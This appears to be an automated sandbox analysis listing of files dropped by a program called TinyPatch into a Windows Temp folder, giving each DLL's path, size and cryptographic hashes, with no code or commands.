4d30522bd344357bddf4f07b67b0d98a8e3517eeb548c047de8d19c7d36692b3c89f757b4efa437e8fb2a099f7367146554f2de277794b015247438b6c330f47

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\PresentationFramework.dll

Filesize
15.1MB

MD5
7bc571bbd86b57b59bc6257ffbb7d139

SHA1
6b808a40dd72dddcb900bfe81ecf296420b49522

SHA256
03d12fee9baa96b1d4c434d17fa9ff8481392dda4d54d6995fb663e0b07bb7dc

SHA512
e7fc98930f72535ff314320e2a6ec8e3d86bf317bb9843306e3e8632695160bb76801cc2bf563d574f7946c42a582c7ebfe9de8ba62f2ef6276445a12b41b633

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\PresentationNative_cor3.dll

Filesize
1.2MB

MD5
93b917c939ec3ddfdb75359a1c38961d

SHA1
62352b83989ca301629d20f0a519b6cdde3569a5

SHA256
ed4eefa93debb2967807bf866aa5eb0b80d953d1e6a0ac43a337e36e1e4beb5e

SHA512
245e99b7711fd49cd14bda8e0bd78144fbd68dec1af399892ba1eba256670cd60b3f85535408990be8c01dd7cd8f81efabc022980384844dd994f169f7eb286c

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Collections.Concurrent.dll

Filesize
185KB

MD5
992c175788f755fb2a42d8396d3cdc81

SHA1
e6356673f7388c74398874e0788964652120721f

SHA256
e0b327e294e9d2159dc124d1f8008438273e36902bf7d3c75589c0374b2d2169

SHA512
7e741cd8763fa32d243d540b7abaf9bc993a2a6d870b08d3ab52de5c8462432d026d3a22ceea51ebd98f03903083fa1e0551168559f14cd846175a5030c314e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Collections.NonGeneric.dll

Filesize
95KB

MD5
a8d917449a4d16c59475bff47dbe9c2f

SHA1
2f7c3fff9523d9a68b022808828be263a7fd11c8

SHA256
88a92d9af78bd06d775609ec1a8f20deed6228894992ef66df07720db5902179

SHA512
e03636884e3dce45a0c7604effa36e90089426a802c7e95356b3002898be7a91fcb386101d48c2d5c855234e5b6541e02dc9289cf8a62622cbb8addf177b3e9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Collections.Specialized.dll

Filesize
88KB

MD5
bf9a3586fec3260029027a33b85895a9

SHA1
2d1d81a5b8dcbfcd55b736e0f7315427f8a34f18

SHA256
f48f2a6c889e04ed84623a6daa6e8111ec803296ac430ef0c28891d18ffa31d0

SHA512
c384fc356a9f36a6b784d679db68bac7c1b191143ac4bda850cb025926c6d28213cbe10148d4de4899fc04621186326ae26c146b995001a6085a30fd1d4028f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Collections.dll

Filesize
324KB

MD5
1a8a403bc2f3e820eb4a362ad02b9888

SHA1
fe9351468302278d53f5f1bb0345480c2662ccef

SHA256
c06b2f5d1c54cc7fca9eceda9bbe3bdd08ec20abf8fa4edae67db2280c233627

SHA512
87fe8047a34149eee08330b746b6ecf6ab6c7cf66edeafb6cca111275b67d08216a8bc96577d98591dfd0f529b811ae89ff6d45b3d92b82d110688f3d64f722b

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.ComponentModel.Primitives.dll

Filesize
52KB

MD5
ad43b19efb5bf397a7ff7f0c4bc23f3a

SHA1
557831bf876e662941658d45b7a63242229e62fa

SHA256
b95484e1e93daab32a9871faf33800ab3c583b1d830dcbd961a6cfb0cef408bb

SHA512
bcbad6dddcd29c9e7f435fe38472d2cf76a9d2c9af8990a31ce86f051039b6ec2e28c0064a165e62b18883a6091cd9d9361390d4fd63ec6960910139e40f7b52

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.ComponentModel.TypeConverter.dll

Filesize
691KB

MD5
934f771ed3849265f7cb89866a84b26e

SHA1
f5b3302fdc168514e37c76633ff7dd0968f8c833

SHA256
e73a35f151a08896219ef06673eafa3d17ffe1b9c2e6a57e77d07f2dd243ad54

SHA512
7149ec592a4c60b689e8b196c5b10c22b401f820b47bb9d0be679b36bedb3e5b6054a07396d49cfc4daa1f8d9882494e373b7268349a9cac753c81e61c5cee45

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.ComponentModel.dll

Filesize
16KB

MD5
5443e5c4e2602e2a0afe3f9d4d5cdfb5

SHA1
9c31db28d00d0616afeef4bf3b42b9d5a6a07a1d

SHA256
6ef0ba90e0ae890db91b6b005117b497e944e79b520c098b8f06040503991030

SHA512
2ef249c5eee6bda22fa30d3512d924b79d4d0e283661847d4115760bacd8bc0c358bd637e6b16b0b87ce04fdbbb19a555003dd19b3adcf172635428c17d7d8a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Configuration.ConfigurationManager.dll

Filesize
959KB

MD5
6914ee97fdcf185fb0a30c62212dbf6a

SHA1
648a55c63641349f548d078eefbf50c5def381e4

SHA256
fa9eabf7d25e38b8f2388489c1fc8ca272a01364137bac26762819ca8f26facf

SHA512
1b7219376c82566d50c49f521436163eda8fb50d9667527a20d355c716ea444b92cbe756d20862e16a768ec067fb8305ef011cde1149cfe9031d0d84479ef50e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Diagnostics.Debug.dll

Filesize
14KB

MD5
5551bc52714c47940af0805e12d14585

SHA1
98f951c402af93ed679d02036b54cd1d49facf94

SHA256
099b31a6e3afc8afb1519509a13d0dd9ef1474821deeb4fd1141dca6125fbc46

SHA512
4dc740b724804da1c38381c4eb7c9d9eeb2a2fd68b1c427983ab2c2a1a2d51334e929a937d622b4ff1e7caacf6c041f7873774f6e100d14ee3b575b73e8b85e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Diagnostics.DiagnosticSource.dll

Filesize
97KB

MD5
688f543b6918ed131a84815a78e6418d

SHA1
9da9f0d615e74bedb80860e7b6ebe94a4cc13715

SHA256
85cb40bb2d7547646bf01069001b766485a880601a84b69c89ef40c789288937

SHA512
b9df28f444a18062677e2669f77df2f7f7632be62036d9ef4c65b2633a830de2d742ace1b1b996ac8eb4004a7fc33e75a4447ec8f841ef95142841250973507f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Diagnostics.Process.dll

Filesize
251KB

MD5
bf5183f8265c7ab13da680f758dcb596

SHA1
be25478b6c3357e3507d679269d1d4b97c1ef648

SHA256
5f4591a617547661aa486c5b31cf9673be4c95b930a5cf898bd23b07bc1bd8fe

SHA512
5507ab30bd53bd36a6cfe25037d4c3b6e5801a24cbc17973e927b1b9675fb5be2551d73cc3b249bec118928d2d51c560cf5ec8939bd08e178a457f68ea8d3ecf

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Diagnostics.TraceSource.dll

Filesize
123KB

MD5
66e23826c6e7683c68195dfd20c7e57d

SHA1
01a9225bfac17b3132eba05622a6d75dd26c7b6c

SHA256
196ca48951c0df5d2cd78ceb73b5626aec73f78edde46053ed18560430e67668

SHA512
8582cf5050fc520fbecd866b19d9510c63adde71489daee705022464211d1dc9a6c9996926725ac563cf1a64546ce2bf036427b0bfdfba529a3949dc78889c0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Diagnostics.Tracing.dll

Filesize
15KB

MD5
bb1b038b4329e69857e0a74431c2da9a

SHA1
b29a2ce9b720689341fb504cebc3442cfdf30bf0

SHA256
448397f78f01848e46f82dd1044c205a0758fa6f0a5202d25e77e17b1b93b88a

SHA512
207d222e22df4dae4fe6692ff149bd929d92434092950f3668a10cbb0c251f3625305a3244125303c750aaaf5575318e05c90f2bb05c29ea1fbbc67b3765d923

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.IO.FileSystem.dll

Filesize
213KB

MD5
7de43fff6887ce2c7e1a3e857d9dae32

SHA1
1c08016b08f44ed510dc3c9b3415c0c437fd6fe6

SHA256
d9c448babdcf592e0fcacdffb395ec66ddc74469e9a7fcf281bdacf4f9be7382

SHA512
c87ebf4e57ca935f51721d72ad8f46b8468513a0ffbea5d001f72be7c94f4c99b0d793cc589517c348e9e20f62eb8303eedfe0ce6fcf2a4a8b5b10ebd4040d06

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.IO.Packaging.dll

Filesize
266KB

MD5
0e3910d0ab4f03d456f4fa3147006388

SHA1
fdcfa47b69ecc1c94dbea8c10f7185112e64de1f

SHA256
1aa626b5dc1dd98f92619e7398a3502ca07831fc027ca3cfde665304c7648ef5

SHA512
74b4b9072f32ad3429d14240ae71390aaa35d9561d6040ba4260cb3eca7e9edad06a12d584decaf1f8d3a2d9439944d14c80ad4091734cec9eccc6cc5922f75c

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Linq.dll

Filesize
411KB

MD5
27fea566be23b3fc10d7d8274184bbed

SHA1
6e01bcca3ef6bb6a9673f1aecd60881e42856003

SHA256
990e7ce0c3aa912e4cec7cdd6d9602c202daba2759058ed61e5f1a002035ae3a

SHA512
c099b03bf4ea3614ab4b65d1e853ef5507ee134b534e350bcaa570ba31a92623c9c6fa8dcf80e671937c7acc20f9aae127df2ce1caf415a514a9b01ba8448904

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Memory.dll

Filesize
176KB

MD5
ec20ad9dc70036d33dbfe26205578f46

SHA1
f5f487dce89180bbe5889c3becd5fc32eba32933

SHA256
dfb494d5654d10101cce8cb98850f2ffd68464bcaa0353109f3aeef8e9b8534c

SHA512
266753705ba6d24227f0c2a5a5660829b61a441b927df48880a14138ebaa5afe779407817be43cb119a22655b4ac3326a6734116550d617bee67511386ecd4ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Net.Http.dll

Filesize
1.4MB

MD5
3005e19fb382841f97af0508814d821a

SHA1
bd74cc9e25f9c503b24a02ae81cbcb3fef3b780e

SHA256
862cdc56d59371f55d8fc88a7fc363268d3c5a347b2ff0d54177484827b07fc3

SHA512
45ae42a2df1eec2646dd552d06a966d03c4a1dfbd245b3ac795c2921060c99d7807a458e78ff2d5efd46c8c1ee6d675e7caf3e36d63525665ad2515a40a6ef4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Net.Primitives.dll

Filesize
208KB

MD5
205911b8991a2ba5c148421a1613af48

SHA1
3fc23e2a1bd880944d1a4b9b3680137e89afca63

SHA256
95dce881993f1ddbc0dbd9fcd69aa99f786251332b7f84a7fc8216eb79c051d4

SHA512
df74439725e7f548782df8e523d7aaf3ae620ce7e3c89e83a5849fbd4f474bafa1c896f389a7340b01c2d43b01750df22272a388cee7bb6eaa0353db4e7f1215

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Net.Requests.dll

Filesize
339KB

MD5
cdfde683a8dfcf189e6ef13d79fe6ac2

SHA1
eadf33b7b7d0c9080ae36ebabce595e0c821afe0

SHA256
3ea325baf9b494bffb7a1c3e572ee5305fc3f3d6343e0d1045dd0586a6ea134d

SHA512
3dde40b9335448bec85e48e5201f948cc11d491474fd1aeb97f6ebc901dc99e2078b64d78ac7550e6c4acce5c2392d858e54e019b150d95203ff26093390c925

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Net.Security.dll

Filesize
561KB

MD5
4eec7cff8589af7ce9e733c047398831

SHA1
5a56482de9d7f9268bd1721fc1e73ce325070bac

SHA256
f2be95efd5f844053d5ba9822dfc75821d8e9bc972f41e468051f3852cf0654c

SHA512
fd53340a7daa18ecd61d725f25df4a8b94f3103d883904b0e8969d8fb44a03307e6bbbd1e0f07d9c6114888b07a3a2fecd9c9e18eabad51574664cc13a439884

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Net.ServicePoint.dll

Filesize
33KB

MD5
d9493d7a81e9cbf310c1abf17011893a

SHA1
cee4c0895eab932c46889315b9084ec89c38e9a3

SHA256
5c127c2d20f679a2470ed22cf3803fb40f9ccc6b4c7f9fcf8f4cb6502adc215c

SHA512
bcc4db709c18a19c9cf699b57fc434e57bd7dfe8cd7781337fc80eea9f8b423ebcc11b86a340544a3baeedd4952af9663ef21efc547686aa1c134d28d3ba440f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Net.WebClient.dll

Filesize
155KB

MD5
44bf76de7f1c343f2fcaa3409da1addd

SHA1
6219d959b052a8fca7cf226ad931b8067b1cb9dc

SHA256
70800e07022069a911ba15e0e287348b61cb6ecedc4a5c051e3ede64074fee89

SHA512
70fd04d7882748f8ca444948fa4998287c517be376a92b34bff1686b8d3a56c10c21d20535d3e06d3e7b88ece237d74211a0cdb8434e73777e0a4406f7a4e958

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Net.WebHeaderCollection.dll

Filesize
65KB

MD5
596e86ca6e905e9e39a22a414565e837

SHA1
5b20a087f3053353d044ac3e7bd910e84cd95775

SHA256
1233307a5c573f5fd04bbbe86181477d60fff68c7b023693c7d1a79d46a2dec3

SHA512
4261502b56e965cba5fefe7af39b42533daa82d8a840288c7c326801c040d51c38dcd21f59f43f6664cb759b2c20c904812ea570711e3cadab0ccff031e7509c

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.ObjectModel.dll

Filesize
86KB

MD5
c0fd9e3d9cf11aebade4c9154d343377

SHA1
c1bee1d415e8301f78861fc88271609388652c61

SHA256
dd3056b9a3fabd89fc59b0feb6fa0edececf76f88f96a545585b48242ecfbbd9

SHA512
3f65d44c257f72c9970b1b8c5206dd884020faa0da9487898277bc4f218d189b5dd6c2a2963e1f8f653c14baf17f7fb9b415aeca064d450f8e572dea229fb58b

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Private.CoreLib.dll

Filesize
9.1MB

MD5
3bef1d84ef1785381eff399adec681df

SHA1
6a933f1c9f8f5cecb0ffa9aa0d6b382854ed99ae

SHA256
43ccf83cf6dd08e2ba9159990a0b099493667c423de51b1db1191f05a748fe51

SHA512
9f436e7eb201927663b93e691d781b44d2d34011215a2b4dbf7584e5d788528f7601a7e9e4bbf422734ab9792984a44eed2bf5d9298940eb37420bfdef2066c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Private.Uri.dll

Filesize
237KB

MD5
8a730b383910a79ea2b9d1c06b11a7ae

SHA1
e9905d342be85151eb94f42da135aec525cc2494

SHA256
a1659efc1d703b3ead12b4e2132d3e2d7443c921e2833a554961173510ffd211

SHA512
7182a50910cc21698c1edc53c8f13fa9cd526c231e951d6f05df68daa864ddfbd4a365609c35f7d1d1bc1da7d08ee1c251f6a96e30b1e33644a0b32e95b57d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Private.Xml.dll

Filesize
8.0MB

MD5
2e0bca776c66205b6ff384b2bcb502e5

SHA1
65ebef087cd75c395d2c57afadb7837181213ba0

SHA256
05d839af14b4f847189259fd2526a7d47c0f0aafacf913224c159364b06f39ee

SHA512
55dec22ff719ba04363037514872cded0b8e6e15c581c3b947b1a7bb5b504fef14601296fe21c259f854b414d2a9d917c5076b63ef71cda49155fd5d89c88941

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Resources.ResourceManager.dll

Filesize
15KB

MD5
18e44aa1e31451c58742d50fea127d16

SHA1
3bdb4d9cefcb36b780a43b00df585dbbc128414b

SHA256
32342669f0efbf28f74210b9b7e6e2070b3cf5e1d4f37f7dd3ba3666f8ba5403

SHA512
30dbac2812d033c8d7bed3401b3a0f2adafc6c373df2e177e3c51d7ea6bda7c64a53bd58a5a8dae32647aebe0126a92a66b704f5532a74088045b9ed19a5f22f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Runtime.CompilerServices.VisualC.dll

Filesize
17KB

MD5
a45ad8a8dbd3b7f3e05e687d32d345fb

SHA1
0abc21058719988cb0c5a05de65cc659e929aa66

SHA256
f4991d6cb5d8b9034dfad1b5d66edbf59c86140433cfede99772815104dc178d

SHA512
5ef1598bc15e9b9f2f40901ac4fb35203243538fbe08f87765d5635b1c2467fb08eed21b5c35246082cc872758d9d10668e123f5d8c2e995ef2bacacb096ad11

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Runtime.Extensions.dll

Filesize
202KB

MD5
672d0c20b632d42f14f3c4bd2d9d2739

SHA1
84aee0e0d27900728ef601f68bd5892937453d22

SHA256
2f5fd0ebed622e1ee3da1a0b96adc2e3e2a4bd91d231594acc8d6dbed441b604

SHA512
76e2c44d166412598994c48cfa8426d09ff782b8b6703fce81710576b2998be6bfaa8f675ca67e3ebf056618a839f929ac6d8016f580c331d11f9f96c3018bc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Runtime.InteropServices.dll

Filesize
52KB

MD5
1076372d4f3d562c2d06ed4e5d7b76fd

SHA1
4ec0e72141aa8684ca22429844626f0fa6b665e9

SHA256
9da45352ed11cd9399be13780e1c5c235cd78e322c9b23acd4ab8ed65b76a67a

SHA512
3384c74d2a0a4fbff144e529c114bcab1265faca3509e41eea5efcf3bcdef2f836ba0e2ba1abec31cea1dcbe61a42afb33590d45c24029664f931966c74c9bdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Runtime.dll

Filesize
52KB

MD5
6874d29dc20943dd13b3898cd54cdd88

SHA1
3eb8c35b2792f5433f45bb4f04e63fa16e7d9782

SHA256
20a1ecc100a50c567c170063b18e1fdb0f9d41ea5878981bd3c38f95544ca529

SHA512
c800164aef2b1bfbd01f16360184bd416536ee4e182f39317f89702465d11616ce320575e6e442552142957f027a3012126eed54c32ed39d585a357fa26f01b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Security.Cryptography.Algorithms.dll

Filesize
675KB

MD5
c11aa05814eb3441df91a9cba416cf63

SHA1
8b201581b2d8fddc9ec5036323e68be5e19f6a24

SHA256
7862bc0b31f9e06b06fc3271027d4f98b00a4a73bc8b3354933e73dfc9857587

SHA512
3d4f1deb6d50a039923ebe4aa04919baef4c550f3fd99b5336e7398249250a0628ddc4cdf017abefc05514a718237f947fadd9e9a68b77205b511ab2c134f929

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Security.Cryptography.Primitives.dll

Filesize
100KB

MD5
14eae3fa39baa11fb785524adcc172a0

SHA1
9e13bba592eddf2bd662003260366cd5ac82283f

SHA256
dc6d23ae3191955e424b4ab5bb0cabb970a1788ab693c9f6e4cd43c7ba5dfd18

SHA512
8cb8f454f836daee2173a844905a16823db1a2e0e096f5b4e58b51cd049562afc9d64de21ae304725a33bd3e3f88ebe627c213aa9632adfac4e385e8d9c626a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Security.Cryptography.X509Certificates.dll

Filesize
454KB

MD5
1bb84a0914dd86646d4d423172c2bda4

SHA1
58a9ab1f5c9f54f43c7927a674cc115e8b4c5ffd

SHA256
cd1e54c12d47708198c9449b7d06d2b0034d9d9bcb22a5174cc42111bb0913e8

SHA512
05aeafe8fedbb27eb4bd79f07bb05950bbe249b9a773ef5a0ac52052108d944d386ee646af16a0f859a0a1b0f5a56726da6511db3dae5b1721f0519e1bdfbe2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Security.Principal.dll

Filesize
14KB

MD5
d7053e07d29f6548738ac17bcc0319a3

SHA1
043015de95e66f0358bf27050d38137124545f71

SHA256
4a8d8f2d5b3e84a3ea268aded9b145d0626f8c226dd9224ddcd0bb236805c935

SHA512
ca5509a27b8b3eeaf0b4b6f3d30965360291f23aed51e805b3467f50a7e899c4bbf2555251508ddec74908261df73e6ba818e8c6c6e3b2933321d23e50aae10a

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Text.Encoding.Extensions.dll

Filesize
14KB

MD5
128862b6211e4968b44c417be3b7373b

SHA1
acae1850a6082e2f8ab717377d63b0a771a8d970

SHA256
4b406bd4a1a4c7d4015d5c7f5cf9671dec32209e22f9b1872d85876ac72c77db

SHA512
c06a0fc69379139be339d64e6a3c474f910743b80691055e8d7b7340a89175a312ba78f282e03cb96568f031de84700d2896c06d8c2749211708b6807acec0f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Text.RegularExpressions.dll

Filesize
385KB

MD5
a4a481b0511e35077b8686a709a25c21

SHA1
ad18ab5564f818437d53a52c617493b5b04473e8

SHA256
208ae0dc8e09d5b414efea346f22e847e9bbcc23ccf4d652632cbf8ced0bd846

SHA512
97eda35809808028889a68750ba84da7bee745d812380ecedd77392418531cb70cc0622cde9bd5cae94bcbe47a7a29addba02a39b00c2bc9c3a276593eae94fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Threading.Tasks.dll

Filesize
16KB

MD5
2110985791b8fded0dcd4e67a5727665

SHA1
d1049e6fa55b4cd0034acdccf851a49e7538c141

SHA256
5ae758da56765672300750a5da4552946e9fcd1da0b0dbf41aa7ea6b55c6cbef

SHA512
585fdff6bced4513518d79486add78a5bd8b11ffbbaf3c07831de9b26b5e0760dce69ec6e3d1773a59b9244d1ff16041e197b100681154c8c59273ea5153bcf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Threading.Thread.dll

Filesize
17KB

MD5
e28b58d37ecfc7eceaf280ed742343f5

SHA1
bb9a306bd8be1579f81edb80ad0114d28d2bd114

SHA256
de01a740531b6411d8b01a38a416b6388d755954a7d29d6b50ca71f0ae4c96bc

SHA512
83dbaf4e873e8174ae9716ca1b8300636761902da5c0232d3b4de31e51c95494e23a67859576804412c345b01813cdfa60ce034d9c8f89374c1e0c7ac4a55aa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Threading.ThreadPool.dll

Filesize
14KB

MD5
e3571049c8b45982e1ca741057f4f22c

SHA1
924d696c3a1ff405c957bd69a3570e13e0ffaea4

SHA256
ce8a2fb0ee094be943cded2cb0fac878055b752728674350401e7f1339c9cfbd

SHA512
eb53b2b6ab602e3907c3e4e4d94380538cfba3ac1a42fe33811c20e02024a0add0896154eddcf06890d10435ad27e604cba19e42b3031f1d930680a60dd0e53b

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Threading.Timer.dll

Filesize
14KB

MD5
5f10991ecdf7d37a0aba0d33b0054001

SHA1
518fa68c7f9238dcf1e8d35712dcb0098cbe9169

SHA256
bb630ffa1b74cde8ffc17d1c26fef6fd215d9b1b134c9a0fa38426af90b191d5

SHA512
86b4e60480af33e633b37adaf6aff22ffdf77c5d7b2347239e9d1ad3cb39e6f3054318411d9c0b4483d5748b34113b29ecec558a15e864f0a82dae7802c936aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Threading.dll

Filesize
75KB

MD5
c8d25e5421e63e07974aa119971b56f5

SHA1
66d4dddd001bb3e432c575cfee094cb6d4dba0bc

SHA256
48f28a34628f517ec1693a5ed02ec30c2cb354a8423c43327825ead731ccadc6

SHA512
bbcc3746c978cc68f14ea735652841068822d606ad63b87538953569a9d683d5df0aa1d6901f65234de82730baf14e652879ffa8ee9fe72328fab91780ebe428

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Windows.Extensions.dll

Filesize
116KB

MD5
77265623f14e3d39286c7ff54264ba86

SHA1
d6786e33d02d92e783c3a2b69e632e4bd44f45a6

SHA256
2783ae2cb0d019f44e4d75a0a4d322575d38b9e2a6c3bfd27ce9ca81ed9fc337

SHA512
c5722f1987e8167177fc1e2ff85f5939f28e77de7d7afa0cf85417c91d8b03fb968c3a050838987c469188904c199b2460c804b2021e173e5d7d4ce7aa92c9a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Xaml.dll

Filesize
1.4MB

MD5
b8669a3dbb9ba437449cecd2cf16282f

SHA1
abca27d391ceb6b86ebc730196688258d17618b8

SHA256
7bd25ecc597ab4724f1275d9e4ed74b72d8b0811e062946bf2f338af5d890c8c

SHA512
34fd7a604aa31383bc0639aad79c039cefea03de224cfe957f43e2d2140ef0bf1cc25fc9034a56c8bb1a46d8e1221e8af50353bc36cb88171fcda229632a42d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\System.Xml.ReaderWriter.dll

Filesize
21KB

MD5
24afced7db9a99bc4ac548e99763a093

SHA1
cf7e9bd3d518d5eba31b02e31d53a655cc3f92f5

SHA256
6d545167f9262a28c9ef9fe8e639e6219e9ab2d124654da1a8eb6fa0db9e0183

SHA512
43b8aa57a64aa0dd4e8056fd7d2c4ced02c9ef213ea1a435941f787cb613bed7134fb2431ee01fc6e70302785fdbaca65d9640d0cbb647734a2760208e639efa

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\TinyPatch.dll

Filesize
120KB

MD5
b0723e6b056e34b13c988e7d822433e9

SHA1
2209909d37a826cbe412b540c40a5f0f71c78a7c

SHA256
bda83032663219c6f366488c2eac15c13a80d01296c78861fef8bbdfc7798921

SHA512
a4d4e677b82903bf310492736b0663c174d922c26a60eac4b987c573e7531d7ab11d24169aa635ee67ed446a9f33ba422558c834920ae3f04247cbe886c19a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\UIAutomationTypes.dll

Filesize
272KB

MD5
c856a5e1458398c5d869263b3ba4af4a

SHA1
961d244e882858695be7e92bbfba2dfe15f01a10

SHA256
d9ea457607174d8f78ce78ae1b4c12aefc6c78f02eca88ca005ecd92866dfc45

SHA512
512435de86a446848540887354799eee0605d6d113c043772eaa3bc992c0a838c078560ab04e2a3b0e153e566e8f727bb473ecf541872eb9c4e7d62623602fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\WindowsBase.dll

Filesize
2.1MB

MD5
b39792e10bcb9dd57dfd54454c9689e5

SHA1
733788a3646d4690b4221fec4be7c0a58c40bf94

SHA256
cba553542c4ae0bf44523dd2feef65e3b363cedd53a9559fab909ceac0ea54d8

SHA512
c99cdffad83764d1fa74aed3ecc31809d0507733b77ee38d9ce0cbab58ea3aeb874cf037fa22660d63b34bd2a2cb58d2fd2dbaea1c10868127caa3cd77f08d8b

